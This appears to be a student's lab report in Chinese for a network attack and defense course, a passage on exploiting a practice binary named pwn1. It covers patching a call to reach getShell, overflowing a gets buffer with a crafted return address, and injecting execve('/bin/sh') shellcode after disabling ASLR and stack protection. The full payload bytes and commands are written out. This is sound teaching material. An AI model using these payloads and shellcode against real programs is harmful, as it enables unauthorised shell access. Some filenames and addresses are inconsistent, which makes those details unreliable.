当前位置：首页 > news >正文

20252810 2024-2025-2 《网络攻防实践》实践9报告

news 2026/5/24 4:58:24

学号 2024-2025-2 《网络攻防实践》实践X报告

1.实践内容

总结一下本周学习内容并介绍下实践内容，不要复制粘贴

2.实践过程

实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

三个实践内容如下：

1.手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

输入命令sudo hostnamectl set-hostname zhangdi 修改主机名称为自己的姓名，同时修改文件名称为自己的学号

输入cd ~/Desktop进入目标文件所在的文件夹，输入objdump -d pwn20252810 | more对名为 pwn20252810 的二进制文件进行反汇编，并用分页方式显示结果。

查看以下三个函数

foo 函数中使用不安全的 gets 函数，存在栈溢出漏洞，可被利用覆盖返回地址。

getShell 函数直接调用 system("/bin/sh")，是攻击者的目标跳转地址》

main 函数简单调用 foo，作为漏洞触发入口。

攻击效果：通过控制 foo 的返回地址跳转到 getShell，即可获取系统 Shell。
getShell 地址: 0804847d

main 中调用 foo 的指令: 80484b5: e8 d7 ff ff ff call 8048491

这条 call 的下一条指令地址 = 0x80484ba

输入vim20252810打开文件

按esc退出，输入%!xxd以16进制的形式打开。

输入：:w!强制保存

再次输入objdump -d pwn20252804 | more发现已被修改

输入./pwn20252810

出现 /bin/sh，实验成功。

2.利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
先重新把你的pwn文件拖进来并命名为pwn20252810
输入cd ~/Desktop gdb pwn20252810安装gdb

输入objdump -d pwn20252804 | more对名为 pwn20252810 的二进制文件进行反汇编，并用分页方式显示结果。

foo 函数中存在 gets 栈溢出漏洞，缓冲区起始地址为 ebp-0x1c，返回地址位于 ebp+4，两者偏移为 32 字节。目标函数 getShell 的地址是 0x0804847d。

输入gdb pwn20252810调试程序。并输入r运行。
输入 1111111122222222333333334444444455555555。

输入info r可以看到eip的值为0x35353535 。

输入r并输入字符串 1111111122222222333333334444444412345678，1234 这四个数会覆盖到堆栈上的返回地址。

输入q退出，并输入perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > 20252810zd_input。输入xxd 20252810zd_input将要写入的字符串存到20252810txc_input文件中。

输入(cat 20252810zd_input; cat) | ./pwn20252810
将20252810zd_input中的内容注入到pwn20252810中。输入常见指令测试是否拿到shell。

3.注入一个自己制作的shellcode并运行这段shellcode。
进入桌面，安装工具execstack_0.0.20131005-1.1_amd64.deb。
wget http://mirrors.aliyun.com/ubuntu/pool/universe/p/prelink/execstack_0.0.20131005-1.1_amd64.deb
解压
sudo dpkg -i execstack_0.0.20131005-1.1_amd64.deb

依次输入execstack -s pwn20252810
execstack -q pwn20252810
设置pwn20252810程序堆栈可执行，并进一步查询是否设置成功。

查看当前ASLR级别，将其设置为0后再次查看是否设置成功。
more /proc/sys/kernel/randomize_va_space
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

使用输出重定向（perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_20252810）将perl生成的字符串存储到input_20252810文件中：

在当前终端输入
(cat input_20252810;cat) | ./pwn20252810

另开一个终端输入
ps -ef | grep pwn20252810

开第三个终端对pwn20252810文件进行gdb调试。在ret处设置断点。
代码如下：
gdb pwn20252804
attach 396234
disassemble foo
break *0x080484ae

在终端一按下回车，在终端3输入c继续运行

输入命令
info r esp
x/16x 0xffffcf4c

可知查看栈顶指针所在的位置为0xffffcf4c，4返回地址的位置为0x0102030。shellcode的地址为栈顶指针的地址 + 4 = 0xffffcf50

重新构造input_cmr文件
perl -e 'print "A" x 32;print "\x50\xcf\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_20252810
(cat input_20252810;cat) | ./pwn202052810
ls
whoami